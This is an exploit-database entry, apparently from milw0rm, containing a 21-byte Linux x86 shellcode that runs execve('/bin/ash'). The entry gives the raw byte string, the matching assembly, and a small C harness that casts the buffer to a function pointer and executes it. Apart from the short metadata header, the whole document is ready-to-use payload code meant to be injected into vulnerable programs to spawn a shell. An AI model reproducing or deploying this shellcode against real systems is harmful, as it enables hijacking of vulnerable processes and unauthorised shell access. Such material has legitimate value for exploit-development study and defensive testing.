Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)
Author: zasta
type:
platform: linux_x86
port: 21.0
date_added: 2004-11-14
date_updated: 2018-01-12
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
/* 21 byte execve("/bin/ash",0,0); shellcode for linux x86
* by zasta (zasta at darkircop.org) */
#include <unistd.h>
#include <stdio.h>
char shellcode[] = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
"\x2f\x61\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\xcd\x80";
void code() {
__asm__("
xor %ecx,%ecx
mul %ecx
addb $0xb,%al
push %edx
push $0x6873612f
push $0x6e69622f
mov %esp,%ebx
int $0x80
");
}
void (*ptr)() = (void(*)()) &shellcode[0];(*ptr)();
// milw0rm.com [2004-11-15]